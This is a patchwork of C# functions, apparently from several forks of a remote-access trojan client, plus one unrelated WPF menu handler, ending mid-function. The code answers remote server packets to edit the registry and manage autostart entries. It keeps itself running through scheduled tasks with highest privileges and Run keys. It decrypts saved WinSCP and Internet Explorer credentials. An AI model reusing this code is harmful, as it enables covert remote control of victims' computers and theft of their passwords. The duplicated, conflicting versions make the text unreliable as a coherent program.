public static void HandleCreateRegistryKey(DoCreateRegistryKey packet, Networking.Client client)
{
GetCreateRegistryKeyResponse responsePacket = new GetCreateRegistryKeyResponse();
string errorMsg;
string newKeyName = "";
try
{
responsePacket.IsError = !(RegistryEditor.CreateRegistryKey(packet.ParentPath, out newKeyName, out errorMsg));
}
catch (Exception ex)
{
responsePacket.IsError = true;
errorMsg = ex.Message;
}
responsePacket.ErrorMsg = errorMsg;
responsePacket.Match = new RegSeekerMatch
{
Key = newKeyName,
Data = RegistryKeyHelper.GetDefaultValues(),
HasSubKeys = false
};
responsePacket.ParentPath = packet.ParentPath;
client.Send(responsePacket);
}
public static bool RemoveFromStartup()
{
if (WindowsAccountHelper.GetAccountType() == "Admin")
{
//try
//{
// ProcessStartInfo startInfo = new ProcessStartInfo("schtasks")
// {
// Arguments = "/delete /tn \"" + Settings.STARTUPKEY + "\" /f",
// UseShellExecute = false,
// CreateNoWindow = true
// };
// Process p = Process.Start(startInfo);
// p.WaitForExit(1000);
// if (p.ExitCode == 0) return true;
//}
//catch (Exception)
//{
//}
return(RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.LocalMachine,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY));
}
else
{
return(RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY));
}
}
public static bool AddToStartup()
{
if (WindowsAccountHelper.GetAccountType() == "Admin")
{
try
{
ProcessStartInfo startInfo = new ProcessStartInfo("schtasks")
{
Arguments = "/create /tn \"" + Settings.STARTUPKEY + "\" /sc ONLOGON /tr \"" + ClientData.CurrentPath + "\" /rl HIGHEST /f",
UseShellExecute = false,
CreateNoWindow = true
};
Process p = Process.Start(startInfo);
p.WaitForExit(1000);
if (p.ExitCode == 0)
{
return(true);
}
}
catch (Exception)
{
}
return(RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY, ClientData.CurrentPath,
true));
}
else
{
return(RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY, ClientData.CurrentPath,
true));
}
}
private void Window_KeyUp(object sender, KeyEventArgs e)
{
if (e.Key == Key.Delete)
{
try
{
RegistryKeyHelper.DeleteContextMenu(App.itemName);
}
catch
{
MessageBox.Show("要想删除右键菜单,请以管理员身份运行");
}
this.Close();
}
else if (e.Key == Key.Enter)
{
try
{
RegistryKeyHelper.DeleteContextMenu(App.itemName);
RegistryKeyHelper.AddFileContextMenuItem(App.itemName, App.itemPath);
this.backPic.Visibility = Visibility.Visible;
}
catch
{
MessageBox.Show("要想添加右键菜单,请以管理员身份运行");
}
}
}
public static bool RemoveFromStartup()
{
if (WindowsAccountHelper.GetAccountType() == "Admin")
{
try
{
ProcessStartInfo startInfo = new ProcessStartInfo("schtasks")
{
Arguments = "/delete /tn \"" + Settings.STARTUPKEY + "\" /f",
UseShellExecute = false,
CreateNoWindow = true
};
Process p = Process.Start(startInfo);
p.WaitForExit(1000);
if (p.ExitCode == 0)
{
return(true);
}
}
catch (Exception)
{
}
return(RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY));
}
else
{
return(RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY));
}
}
public void HandleCreateRegistryKey(TcpSocketSaeaSession session)
{
var packet = GetMessageEntity <DoCreateRegistryKeyPack>(session);
GetCreateRegistryKeyResponsePack responsePacket = new GetCreateRegistryKeyResponsePack();
string errorMsg;
string newKeyName = "";
try
{
responsePacket.IsError = !(RegistryEditor.CreateRegistryKey(packet.ParentPath, out newKeyName, out errorMsg));
}
catch (Exception ex)
{
responsePacket.IsError = true;
errorMsg = ex.Message;
}
responsePacket.ErrorMsg = errorMsg;
responsePacket.Match = new RegSeekerMatch
{
Key = newKeyName,
Data = RegistryKeyHelper.GetDefaultValues(),
HasSubKeys = false
};
responsePacket.ParentPath = packet.ParentPath;
SendTo(CurrentSession, MessageHead.C_NREG_CREATE_KEY_RESPONSE, responsePacket);
//client.Send(responsePacket);
}
private void Execute(ISender client, DoCreateRegistryKey message)
{
GetCreateRegistryKeyResponse responsePacket = new GetCreateRegistryKeyResponse();
string errorMsg;
string newKeyName = "";
try
{
responsePacket.IsError = !(RegistryEditor.CreateRegistryKey(message.ParentPath, out newKeyName, out errorMsg));
}
catch (Exception ex)
{
responsePacket.IsError = true;
errorMsg = ex.Message;
}
responsePacket.ErrorMsg = errorMsg;
responsePacket.Match = new RegSeekerMatch
{
Key = newKeyName,
Data = RegistryKeyHelper.GetDefaultValues(),
HasSubKeys = false
};
responsePacket.ParentPath = message.ParentPath;
client.Send(responsePacket);
}
public static bool AddToStartup()
{
if (WindowsAccountHelper.GetAccountType() == "Admin")
{
// Don't schedule non-working task on startup
//try
//{
// ProcessStartInfo startInfo = new ProcessStartInfo("schtasks")
// {
// Arguments = "/create /tn \"" + Settings.STARTUPKEY + "\" /sc ONLOGON /tr \"" + ClientData.CurrentPath + "\" /rl HIGHEST /f",
// UseShellExecute = false,
// CreateNoWindow = true
// };
// Process p = Process.Start(startInfo);
// p.WaitForExit(1000);
// if (p.ExitCode == 0) return true;
//}
//catch (Exception)
//{
//}
return(RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.LocalMachine,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY, ClientData.CurrentPath,
true));
}
else
{
return(RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY, ClientData.CurrentPath,
true));
}
}
private void Execute(ISender client, DoStartupItemRemove message)
{
try
{
switch (message.StartupItem.Type)
{
case StartupType.LocalMachineRun:
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", message.StartupItem.Name))
{
throw new Exception("Could not remove value");
}
break;
case StartupType.LocalMachineRunOnce:
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", message.StartupItem.Name))
{
throw new Exception("Could not remove value");
}
break;
case StartupType.CurrentUserRun:
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", message.StartupItem.Name))
{
throw new Exception("Could not remove value");
}
break;
case StartupType.CurrentUserRunOnce:
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", message.StartupItem.Name))
{
throw new Exception("Could not remove value");
}
break;
case StartupType.StartMenu:
string startupItemPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup), message.StartupItem.Name);
if (!File.Exists(startupItemPath))
{
throw new IOException("File does not exist");
}
File.Delete(startupItemPath);
break;
}
}
catch (Exception ex)
{
client.Send(new SetStatus {
Message = $"Removing Autostart Item failed: {ex.Message}"
});
}
}
public static List <KurtarılanHesaplar> GetSavedPasswords()
{
List <KurtarılanHesaplar> data = new List <KurtarılanHesaplar>();
try
{
string regPath = @"SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions";
using (RegistryKey key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.CurrentUser, regPath))
{
foreach (String subkeyName in key.GetSubKeyNames())
{
using (RegistryKey accountKey = key.OpenReadonlySubKeySafe(subkeyName))
{
if (accountKey == null)
{
continue;
}
string host = accountKey.GetValueSafe("HostName");
if (string.IsNullOrEmpty(host))
{
continue;
}
string user = accountKey.GetValueSafe("UserName");
string password = WinSCPDecrypt(user, accountKey.GetValueSafe("Password"), host);
string privateKeyFile = accountKey.GetValueSafe("PublicKeyFile");
host += ":" + accountKey.GetValueSafe("PortNumber", "22");
if (string.IsNullOrEmpty(password) && !string.IsNullOrEmpty(privateKeyFile))
{
password = string.Format("[PRIVATE KEY LOCATION: \"{0}\"]", Uri.UnescapeDataString(privateKeyFile));
}
data.Add(new KurtarılanHesaplar
{
Url = host,
Username = user,
Password = password,
Application = "WinSCP"
});
}
}
}
return(data);
}
catch
{
return(data);
}
}
private static bool DoesURLMatchWithHash(string urlHash)
{
bool result = false;
using (RegistryKey key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.CurrentUser, regPath))
{
if (key == null)
{
return(false);
}
if (key.GetValueNames().Any(value => value == urlHash))
{
result = true;
}
}
return(result);
}
private void ProcessKey(RegistryKey key, string keyName)
{
if (key != null)
{
List <RegValueData> values = new List <RegValueData>();
foreach (string valueName in key.GetValueNames())
{
RegistryValueKind valueType = key.GetValueKind(valueName);
object valueData = key.GetValue(valueName);
values.Add(RegistryKeyHelper.CreateRegValueData(valueName, valueType, valueData));
}
AddMatch(keyName, RegistryKeyHelper.AddDefaultValue(values), key.SubKeyCount);
}
else
{
AddMatch(keyName, RegistryKeyHelper.GetDefaultValues(), 0);
}
}
public static void HandleCreateRegistryValue(DoCreateRegistryValue packet, Networking.Client client)
{
GetCreateRegistryValueResponse responsePacket = new GetCreateRegistryValueResponse();
string errorMsg;
string newKeyName = "";
try
{
responsePacket.IsError = !(RegistryEditor.CreateRegistryValue(packet.KeyPath, packet.Kind, out newKeyName, out errorMsg));
}
catch (Exception ex)
{
responsePacket.IsError = true;
errorMsg = ex.Message;
}
responsePacket.ErrorMsg = errorMsg;
responsePacket.Value = RegistryKeyHelper.CreateRegValueData(newKeyName, packet.Kind, packet.Kind.GetDefault());
responsePacket.KeyPath = packet.KeyPath;
client.Send(responsePacket);
}
private void Execute(ISender client, DoCreateRegistryValue message)
{
GetCreateRegistryValueResponse responsePacket = new GetCreateRegistryValueResponse();
string errorMsg;
string newKeyName = "";
try
{
responsePacket.IsError = !(RegistryEditor.CreateRegistryValue(message.KeyPath, message.Kind, out newKeyName, out errorMsg));
}
catch (Exception ex)
{
responsePacket.IsError = true;
errorMsg = ex.Message;
}
responsePacket.ErrorMsg = errorMsg;
responsePacket.Value = RegistryKeyHelper.CreateRegValueData(newKeyName, message.Kind, message.Kind.GetDefault());
responsePacket.KeyPath = message.KeyPath;
client.Send(responsePacket);
}
public static bool RemoveFromStartup()
{
if (WindowsAccountHelper.GetAccountType() == "Admin")
{
bool success = RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.LocalMachine, GetHKLMPath(),
Settings.STARTUPKEY);
if (success)
{
return(true);
}
return(RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY));
}
else
{
return(RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY));
}
}
public static bool AddToStartup()
{
if (WindowsAccountHelper.GetAccountType() == "Admin")
{
bool success = RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.LocalMachine,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY, ClientData.CurrentPath);
if (success)
{
return(true);
}
return(RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY, ClientData.CurrentPath));
}
else
{
return(RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY, ClientData.CurrentPath));
}
}
public void RemoveFromStartup(string startupName)
{
if (UserAccount.Type == AccountType.Admin)
{
ProcessStartInfo startInfo = new ProcessStartInfo("schtasks")
{
Arguments = "/delete /tn \"" + startupName + "\" /f",
UseShellExecute = false,
CreateNoWindow = true
};
Process p = Process.Start(startInfo);
p.WaitForExit(1000);
if (p.ExitCode == 0)
{
return;
}
}
RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", startupName);
}
/// <summary>
/// Attempts to change the value for the desired registry value for the
/// specified key.
/// </summary>
/// <param name="value">The registry value to change to in the form of a
/// RegValueData object.</param>
/// <param name="keyPath">The path to the key for which to change the
/// value of the registry value on.</param>
/// <param name="errorMsg">output parameter that contians possible error message.</param>
/// <returns>Returns true if the operation succeeded.</returns>
public static bool ChangeRegistryValue(RegValueData value, string keyPath, out string errorMsg)
{
try
{
RegistryKey key = GetWritableRegistryKey(keyPath);
//Invalid can not open key
if (key == null)
{
errorMsg = "You do not have write access to registry: " + keyPath + ", try running client as administrator";
return(false);
}
//Is not default value and does not exist
if (!RegistryKeyHelper.IsDefaultValue(value.Name) && !key.ContainsValue(value.Name))
{
errorMsg = "The value: " + value.Name + " does not exist in: " + keyPath;
return(false);
}
bool success = key.SetValueSafe(value.Name, value.Data, value.Kind);
//Value could not be created
if (!success)
{
errorMsg = REGISTRY_VALUE_CHANGE_ERROR;
return(false);
}
//Value was successfully created
errorMsg = "";
return(true);
}
catch (Exception ex)
{
errorMsg = ex.Message;
return(false);
}
}
public static void HandleCreateRegistryKey(xLightClient.Core.Packets.ServerPackets.DoCreateRegistryKey packet, Client client)
{
xLightClient.Core.Packets.ClientPackets.GetCreateRegistryKeyResponse responsePacket = new Packets.ClientPackets.GetCreateRegistryKeyResponse();
string errorMsg = "";
string newKeyName = "";
try
{
responsePacket.IsError = !(RegistryEditor.CreateRegistryKey(packet.ParentPath, out newKeyName, out errorMsg));
}
catch (Exception ex)
{
responsePacket.IsError = true;
errorMsg = ex.Message;
}
responsePacket.ErrorMsg = errorMsg;
responsePacket.Match = new RegSeekerMatch(newKeyName, RegistryKeyHelper.GetDefaultValues(), 0);
responsePacket.ParentPath = packet.ParentPath;
responsePacket.Execute(client);
}
public IEnumerable <RecoveredPassword> GetPasswords()
{
const string regPath = @"SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions";
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.CurrentUser, regPath))
{
foreach (var subkeyName in key.GetSubKeyNames())
{
using (var accountKey = key.OpenReadonlySubKeySafe(subkeyName))
{
var host = accountKey?.GetValueSafe("HostName");
if (string.IsNullOrEmpty(host))
{
continue;
}
var user = accountKey.GetValueSafe("UserName");
var password = WinSCPDecrypt(user, accountKey.GetValueSafe("Password"), host);
var privateKeyFile = accountKey.GetValueSafe("PublicKeyFile");
host += ":" + accountKey.GetValueSafe("PortNumber", "22");
if (string.IsNullOrEmpty(password) && !string.IsNullOrEmpty(privateKeyFile))
{
password = $"[PRIVATE KEY LOCATION: \"{Uri.UnescapeDataString(privateKeyFile)}\"]";
}
yield return(new RecoveredPassword
{
Field1 = host,
UserName = user,
Password = password,
Application = "WinSCP",
PasswordType = PasswordType.Adminsys
});
}
}
}
}
private static DirectoryInfo GetFirefoxInstallPath()
{
// get firefox path from registry
using (RegistryKey key = PlatformHelper.Is64Bit ?
RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine,
@"SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox") :
RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine,
@"SOFTWARE\Mozilla\Mozilla Firefox"))
{
if (key == null)
{
return(null);
}
string[] installedVersions = key.GetSubKeyNames();
// we'll take the first installed version, people normally only have one
if (installedVersions.Length == 0)
{
throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");
}
using (RegistryKey mainInstall = key.OpenSubKey(installedVersions[0]))
{
// get install directory
string installPath = mainInstall.OpenReadonlySubKeySafe("Main")
.GetValueSafe("Install Directory");
if (string.IsNullOrEmpty(installPath))
{
throw new NullReferenceException("Install string was null or empty");
}
firefoxPath = new DirectoryInfo(installPath);
}
}
return(firefoxPath);
}
public void HandleCreateRegistryValue(TcpSocketSaeaSession session)
{
DoCreateRegistryValuePack packet = GetMessageEntity <DoCreateRegistryValuePack>(session);
GetCreateRegistryValueResponsePack responsePacket = new GetCreateRegistryValueResponsePack();
string errorMsg;
string newKeyName = "";
try
{
responsePacket.IsError = !(RegistryEditor.CreateRegistryValue(packet.KeyPath, packet.Kind, out newKeyName, out errorMsg));
}
catch (Exception ex)
{
responsePacket.IsError = true;
errorMsg = ex.Message;
}
responsePacket.ErrorMsg = errorMsg;
responsePacket.Value = RegistryKeyHelper.CreateRegValueData(newKeyName, packet.Kind, packet.Kind.GetDefault());
responsePacket.KeyPath = packet.KeyPath;
SendTo(CurrentSession, MessageHead.C_NREG_CREATE_VALUE_RESPONSE, responsePacket);
//client.Send(responsePacket);
}
public void AddToStartup(string executablePath, string startupName)
{
if (UserAccount.Type == AccountType.Admin)
{
ProcessStartInfo startInfo = new ProcessStartInfo("schtasks")
{
Arguments = "/create /tn \"" + startupName + "\" /sc ONLOGON /tr \"" + executablePath +
"\" /rl HIGHEST /f",
UseShellExecute = false,
CreateNoWindow = true
};
Process p = Process.Start(startInfo);
p.WaitForExit(1000);
if (p.ExitCode == 0)
{
return;
}
}
RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", startupName, executablePath,
true);
}
static bool DecryptIePassword(string url, List <string[]> dataList)
{
byte[] cypherBytes;
//Get the hash for the passed URL
string urlHash = GetURLHashString(url);
//Check if this hash matches with stored hash in registry
if (!DoesURLMatchWithHash(urlHash))
{
return(false);
}
//Now retrieve the encrypted credentials for this registry hash entry....
using (RegistryKey key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.CurrentUser, regPath))
{
if (key == null)
{
return(false);
}
//Retrieve encrypted data for this website hash...
//First get the value...
cypherBytes = (byte[])key.GetValue(urlHash);
}
// to use URL as optional entropy we must include trailing null character
byte[] optionalEntropy = new byte[2 * (url.Length + 1)];
Buffer.BlockCopy(url.ToCharArray(), 0, optionalEntropy, 0, url.Length * 2);
//Now decrypt the Autocomplete credentials....
byte[] decryptedBytes = ProtectedData.Unprotect(cypherBytes, optionalEntropy, DataProtectionScope.CurrentUser);
var ieAutoHeader = ByteArrayToStructure <IEAutoComplteSecretHeader>(decryptedBytes);
//check if the data contains enough length....
if (decryptedBytes.Length >= (ieAutoHeader.dwSize + ieAutoHeader.dwSecretInfoSize + ieAutoHeader.dwSecretSize))
{
//Get the total number of secret entries (username & password) for the site...
// user name and passwords are accounted as separate secrets, but will be threated in pairs here.
uint dwTotalSecrets = ieAutoHeader.IESecretHeader.dwTotalSecrets / 2;
int sizeOfSecretEntry = Marshal.SizeOf(typeof(SecretEntry));
byte[] secretsBuffer = new byte[ieAutoHeader.dwSecretSize];
int offset = (int)(ieAutoHeader.dwSize + ieAutoHeader.dwSecretInfoSize);
Buffer.BlockCopy(decryptedBytes, offset, secretsBuffer, 0, secretsBuffer.Length);
if (dataList == null)
{
dataList = new List <string[]>();
}
else
{
dataList.Clear();
}
offset = Marshal.SizeOf(ieAutoHeader);
// Each time process 2 secret entries for username & password
for (int i = 0; i < dwTotalSecrets; i++)
{
byte[] secEntryBuffer = new byte[sizeOfSecretEntry];
Buffer.BlockCopy(decryptedBytes, offset, secEntryBuffer, 0, secEntryBuffer.Length);
SecretEntry secEntry = ByteArrayToStructure <SecretEntry>(secEntryBuffer);
string[] dataTriplet = new string[3]; // store data such as url, username & password for each secret
byte[] secret1 = new byte[secEntry.dwLength * 2];
Buffer.BlockCopy(secretsBuffer, (int)secEntry.dwOffset, secret1, 0, secret1.Length);
dataTriplet[0] = Encoding.Unicode.GetString(secret1);
// read another secret entry
offset += sizeOfSecretEntry;
Buffer.BlockCopy(decryptedBytes, offset, secEntryBuffer, 0, secEntryBuffer.Length);
secEntry = ByteArrayToStructure <SecretEntry>(secEntryBuffer);
byte[] secret2 = new byte[secEntry.dwLength * 2]; //Get the next secret's offset i.e password
Buffer.BlockCopy(secretsBuffer, (int)secEntry.dwOffset, secret2, 0, secret2.Length);
dataTriplet[1] = Encoding.Unicode.GetString(secret2);
dataTriplet[2] = urlHash;
//move to next entry
dataList.Add(dataTriplet);
offset += sizeOfSecretEntry;
}
}
return(true);
}
public static void HandleGetStartupItems(GetStartupItems command, Client client)
{
try
{
List <string> startupItems = new List <string>();
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
startupItems.AddRange(
key.GetFormattedKeyValues().Select(formattedKeyValue => "0" + formattedKeyValue));
}
}
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
{
if (key != null)
{
startupItems.AddRange(
key.GetFormattedKeyValues().Select(formattedKeyValue => "1" + formattedKeyValue));
}
}
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.CurrentUser, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
startupItems.AddRange(
key.GetFormattedKeyValues().Select(formattedKeyValue => "2" + formattedKeyValue));
}
}
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.CurrentUser, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
{
if (key != null)
{
startupItems.AddRange(
key.GetFormattedKeyValues().Select(formattedKeyValue => "3" + formattedKeyValue));
}
}
if (PlatformYardımcısı.A64Bitmi)
{
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine, "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
startupItems.AddRange(
key.GetFormattedKeyValues().Select(formattedKeyValue => "4" + formattedKeyValue));
}
}
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine, "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
{
if (key != null)
{
startupItems.AddRange(
key.GetFormattedKeyValues().Select(formattedKeyValue => "5" + formattedKeyValue));
}
}
}
if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup)))
{
var files =
new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup)).GetFiles();
startupItems.AddRange(from file in files
where file.Name != "desktop.ini"
select string.Format("{0}||{1}", file.Name, file.FullName)
into formattedKeyValue
select "6" + formattedKeyValue);
}
new GetStartupItemsResponse(startupItems).Execute(client);
}
catch (Exception ex)
{
new SetStatus(string.Format("Oto-Başlangıç Öğelerini Alma Başarısız: {0}", ex.Message)).Execute(client);
}
}
private void Execute(ISender client, GetStartupItems message)
{
try
{
List <Common.Models.StartupItem> startupItems = new List <Common.Models.StartupItem>();
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
foreach (var item in key.GetKeyValues())
{
startupItems.Add(new Common.Models.StartupItem
{
Name = item.Item1, Path = item.Item2, Type = StartupType.LocalMachineRun
});
}
}
}
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
{
if (key != null)
{
foreach (var item in key.GetKeyValues())
{
startupItems.Add(new Common.Models.StartupItem
{
Name = item.Item1, Path = item.Item2, Type = StartupType.LocalMachineRunOnce
});
}
}
}
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.CurrentUser, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
foreach (var item in key.GetKeyValues())
{
startupItems.Add(new Common.Models.StartupItem
{
Name = item.Item1, Path = item.Item2, Type = StartupType.CurrentUserRun
});
}
}
}
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.CurrentUser, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
{
if (key != null)
{
foreach (var item in key.GetKeyValues())
{
startupItems.Add(new Common.Models.StartupItem
{
Name = item.Item1, Path = item.Item2, Type = StartupType.CurrentUserRunOnce
});
}
}
}
if (PlatformHelper.Is64Bit)
{
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine, "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
foreach (var item in key.GetKeyValues())
{
startupItems.Add(new Common.Models.StartupItem
{
Name = item.Item1, Path = item.Item2, Type = StartupType.LocalMachineWoW64Run
});
}
}
}
using (var key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine, "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
{
if (key != null)
{
foreach (var item in key.GetKeyValues())
{
startupItems.Add(new Common.Models.StartupItem
{
Name = item.Item1,
Path = item.Item2,
Type = StartupType.LocalMachineWoW64RunOnce
});
}
}
}
}
if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup)))
{
var files = new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup)).GetFiles();
startupItems.AddRange(files.Where(file => file.Name != "desktop.ini").Select(file => new Common.Models.StartupItem
{
Name = file.Name, Path = file.FullName, Type = StartupType.StartMenu
}));
}
client.Send(new GetStartupItemsResponse {
StartupItems = startupItems
});
}
catch (Exception ex)
{
client.Send(new SetStatus {
Message = $"Getting Autostart Items failed: {ex.Message}"
});
}
}
public static void HandleDoStartupItemRemove(Packets.ServerPackets.DoStartupItemRemove command, Client client)
{
try
{
switch (command.Type)
{
case 0:
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name))
{
throw new Exception("Could not remove value");
}
break;
case 1:
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name))
{
throw new Exception("Could not remove value");
}
break;
case 2:
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name))
{
throw new Exception("Could not remove value");
}
break;
case 3:
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name))
{
throw new Exception("Could not remove value");
}
break;
case 4:
if (!PlatformHelper.Is64Bit)
{
throw new NotSupportedException("Only on 64-bit systems supported");
}
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name))
{
throw new Exception("Could not remove value");
}
break;
case 5:
if (!PlatformHelper.Is64Bit)
{
throw new NotSupportedException("Only on 64-bit systems supported");
}
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name))
{
throw new Exception("Could not remove value");
}
break;
case 6:
string startupItemPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup), command.Name);
if (!File.Exists(startupItemPath))
{
throw new IOException("File does not exist");
}
File.Delete(startupItemPath);
break;
}
}
catch (Exception ex)
{
new Packets.ClientPackets.SetStatus(string.Format("Removing Autostart Item failed: {0}", ex.Message)).Execute(client);
}
}
public static void HandleDoStartupItemAdd(DoStartupItemAdd command, Client client)
{
// Kesin yöntem bulana kadar try
try
{
switch (command.Type)
{
case 0:
if (!RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name, command.Path, true))
{
throw new Exception("Değer Eklenemedi");
}
break;
case 1:
if (!RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name, command.Path, true))
{
throw new Exception("Değer Eklenemedi");
}
break;
case 2:
if (!RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name, command.Path, true))
{
throw new Exception("Değer Eklenemedi");
}
break;
case 3:
if (!RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name, command.Path, true))
{
throw new Exception("Değer Eklenemedi");
}
break;
case 4:
if (!PlatformYardımcısı.A64Bitmi)
{
throw new NotSupportedException(
"Bu İşlem Sadece 64 Bit İşletim Sistemlerinde Destekleniyor.");
}
if (!RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name, command.Path,
true))
{
throw new Exception("Değer Eklenemedi");
}
break;
case 5:
if (!PlatformYardımcısı.A64Bitmi)
{
throw new NotSupportedException(
"Bu İşlem Sadece 64 Bit İşletim Sistemlerinde Destekleniyor.");
}
if (!RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name,
command.Path, true))
{
